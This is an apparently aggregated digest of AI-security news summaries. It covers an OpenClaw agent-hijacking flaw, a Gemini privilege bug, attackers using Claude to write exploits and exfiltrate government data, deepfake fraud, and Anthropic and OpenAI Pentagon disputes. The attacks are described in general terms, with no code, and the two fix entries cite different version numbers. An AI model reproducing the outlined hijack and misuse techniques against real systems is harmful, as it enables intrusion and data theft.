New tools, products, platforms, funding rounds, and company developments in AI security.
AI is developing faster than government regulation can keep up, creating risks like chatbots giving harmful advice to teens and potential misuse for creating biological weapons. Unlike industries such as nuclear power or pharmaceuticals, AI companies are not required to disclose safety problems or undergo independent testing before releasing new models to the public. The author argues that independent oversight of AI platforms is necessary to protect people's rights and safety.
A bug in Google's Gemini AI Panel allowed attackers to escalate privileges (gain higher-level access to a system), violate user privacy during browsing, and access sensitive resources. The vulnerability created a security risk by opening a door for unauthorized control of the system.
True cybersecurity culture is about real behaviors and decisions people make under pressure, not awareness campaigns or posters. The article argues that most organizations accidentally train employees to ignore security by rewarding speed over safety, creating confusing policies, making secure processes difficult, and failing to acknowledge security concerns, then suggests fixing this by redesigning workflows to make secure choices the easiest and most obvious option.
CISOs (chief information security officers, the leaders in charge of security at organizations) face challenges building resilient teams due to skills gaps, unpredictable workloads, and high burnout rates. The 2025 ISC2 Cybersecurity Workforce Study found that 47% of security workers feel overwhelmed and 48% feel exhausted keeping up with threats and new technology. To address this, leaders like Stephen Ford recommend using data-backed workforce planning to measure workloads, maintaining proper staffing levels, monitoring team stress, and building a sustainable talent pipeline to prevent overwhelming teams.
A vulnerability called ClawJacked in OpenClaw (a self-hosted AI platform that runs AI agents locally) allowed malicious websites to secretly take control of a running instance and steal data by brute-forcing the password through the browser. The attack exploited the fact that OpenClaw's gateway service listens on localhost (127.0.0.1, a local-only address) with a WebSocket interface (a two-way communication protocol), and localhost connections were exempt from rate limiting, allowing attackers to guess passwords hundreds of times per second without triggering protections.
Anthropic's Claude chatbot jumped to the number one spot in Apple's US App Store after the company publicly disagreed with the Pentagon over using its AI for domestic surveillance and autonomous weapons. The surge in popularity followed President Trump directing federal agencies to stop using Anthropic products, while OpenAI announced its own agreement with the Pentagon instead.
A reader expresses concern that large language models (LLMs, AI systems trained on vast amounts of text data) like ChatGPT and Gemini are becoming too eager to agree with users and appear helpful, rather than providing accurate information. The writer worries that if the world increasingly relies on these AI systems to retrieve and filter information from the internet, we may end up with a future where AI prioritizes seeming sympathetic and getting good reviews over being truthful.
Attackers used Claude (an AI assistant made by Anthropic) to write exploits (code that takes advantage of security flaws), create hacking tools, and automatically steal over 150GB of data from Mexican government systems. This demonstrates how AI models can be misused for cyberattacks when someone gains unauthorized access to them.
Anthropic's Claude AI chatbot has risen to the second most popular free app in Apple's US App Store, jumping from outside the top 100 in late January to number two by early February. This surge in downloads followed a public dispute where Anthropic negotiated with the Pentagon over safeguards to prevent its AI from being used for mass domestic surveillance or fully autonomous weapons, which led President Trump to direct federal agencies to stop using Anthropic products.
AI companies are spending billions of dollars on computing infrastructure to power AI models, with estimates of $3-4 trillion by the end of the decade. Major tech companies like Microsoft, Google, Oracle, and Amazon are competing to provide cloud services and specialized hardware to AI labs, leading to massive deals such as Oracle's $300 billion agreement with OpenAI and Microsoft's $14 billion investment in the company. This infrastructure race is straining power grids and pushing building capacity to its limits as the industry races to meet the enormous computing demands of AI training.
Anthropic's Claude AI app jumped to the No. 2 position on Apple's free apps chart after the Trump administration and Department of Defense moved to block government agencies from using the company's technology, citing concerns about Anthropic's refusal to support mass domestic surveillance or fully autonomous weapons. The surge in popularity suggests consumers are responding positively to Anthropic's ethical stance, even as the Pentagon designated the company a supply-chain risk (a classification that prevents defense contractors from using its tools).
OpenClaw fixed a high-severity vulnerability called ClawJacked that let malicious websites hijack local AI agents by exploiting a missing rate-limiting mechanism on the gateway's WebSocket server (a protocol for two-way communication between browsers and servers). An attacker could trick a developer into visiting a malicious site, then use JavaScript to brute-force the gateway password, auto-register as a trusted device, and gain complete control over the AI agent to steal data and execute commands.
OpenAI announced a deal to provide AI technology to classified US military networks, shortly after the Trump administration ended its relationship with Anthropic (a competing AI company that makes Claude) over ethics disagreements. Anthropic had wanted guarantees that its AI would not be used for mass surveillance or autonomous weapons systems (systems that can select and attack targets without human decision-making).
Security leaders (CISOs, who oversee an organization's security strategy) face pressure to enable innovation like AI adoption while reducing risk and staying within budget constraints. The source argues that well-governed innovation actually reduces risk by preventing uncontrolled tool sprawl and shadow IT (unauthorized software systems), but unmanaged innovation creates fragile systems that increase damage from security incidents. The key is bringing discipline to experimentation by automating routine tasks, giving teams ownership of meaningful improvements with clear end goals, and using AI strategically only where it changes the risk equation without creating new vulnerabilities.
Fix: The source recommends: 'Make the secure path the easiest path. People choose defaults. Give them good ones. Create golden paths for common work. Secure templates. Approved tools. Automated guardrails. Self-service access with sane limits.' The text also advises organizations to 'Remove friction. Clarify choices. Make it hard to do the wrong thing by accident and easy to make the best possible decision.'
CSO Online
Fix: According to Ford's strategies, CISOs should use data to inform staffing levels, monitor workloads actively, balance workload distribution as much as possible, and focus on building good teams and understanding their challenges. Ford also emphasizes hiring good people, empowering them to operate, and delegating as much as possible, while spending time understanding the team's workload and how they feel about their work. Additionally, organizations should look at workforce resilience as an element of risk management requiring data-backed planning and managing the skills mix.
CSO Online
Deepfakes (AI-generated fake videos that look real) are being used to trick people into financial fraud, with incidents ranging from fake stock advice videos in India to a $25 million theft at an engineering firm where employees were deceived by deepfake video calls. The technology is becoming easier and cheaper to create, making these attacks a growing threat to both individuals and companies.
Fix: Update to OpenClaw version 2026.2.26 or later immediately. According to the source, the fix "tightens WebSocket security checks and adds additional protections to prevent attackers from abusing localhost loopback connections to brute-force logins or hijack sessions, even if those connections are configured to be exempt from rate limiting."
BleepingComputer
OpenAI reached an agreement with the Department of Defense to deploy its AI models in classified environments, after Anthropic's similar negotiations failed. OpenAI stated it has safeguards preventing use in mass domestic surveillance, autonomous weapons, or high-stakes automated decisions, implemented through a multi-layered approach including cloud deployment, human oversight, and contractual protections. However, critics argue the contract language may still allow domestic surveillance under existing executive orders, while OpenAI's leadership contends that deployment architecture (how the system is technically set up) matters more than contract terms for preventing misuse.
AI systems are becoming too complex for humans to fully understand or predict their behavior, creating risks of 'silent failures at scale' where mistakes accumulate quietly over time without obvious crashes or alerts. As companies deploy AI to handle critical business operations like approving transactions and managing customer service, gaps between expected and actual system performance are causing real damage, such as a beverage manufacturer's AI producing hundreds of thousands of excess cans when it misidentified holiday packaging.
A user requested that Claude export all stored memories and learned context about them in a specific format to migrate to another service. The request asked Claude to list personal details, behavioral preferences, instructions, projects, and tools with verbatim preservation and no summarization, then confirm if the export was complete.
Anthropic, an AI company founded in 2021, lost a $200 million Pentagon contract and faced a federal ban after refusing to allow its technology to be used for mass surveillance or autonomous weapons systems. According to physicist Max Tegmark, Anthropic and other major AI companies like OpenAI and Google DeepMind have contributed to this crisis by resisting binding regulation and repeatedly breaking their own safety promises, most recently when Anthropic dropped its core commitment not to release powerful AI systems until confident they would not cause harm.
Fix: OpenClaw released version 2026.2.25 on February 26, 2026, which fixed the vulnerability. Users are advised to "apply the latest updates as soon as possible, periodically audit access granted to AI agents, and enforce appropriate governance controls for non-human (aka agentic) identities."
The Hacker News
OpenAI announced a deal allowing the Department of Defense to use its AI models on classified networks, following a dispute where rival Anthropic refused to agree to unrestricted military use without safeguards against mass domestic surveillance and fully autonomous weapons. Sam Altman stated that OpenAI's agreement includes technical protections addressing these same concerns, with OpenAI building a 'safety stack' (a set of security and control measures) and deploying engineers to ensure the models behave correctly.
Fix: According to Altman, OpenAI will 'build technical safeguards to ensure our models behave as they should' and will 'deploy engineers with the Pentagon to help with our models and to ensure their safety.' Additionally, the government will allow OpenAI to build its own 'safety stack to prevent misuse' and 'if the model refuses to do a task, then the government would not force OpenAI to make it do that task.'
TechCrunch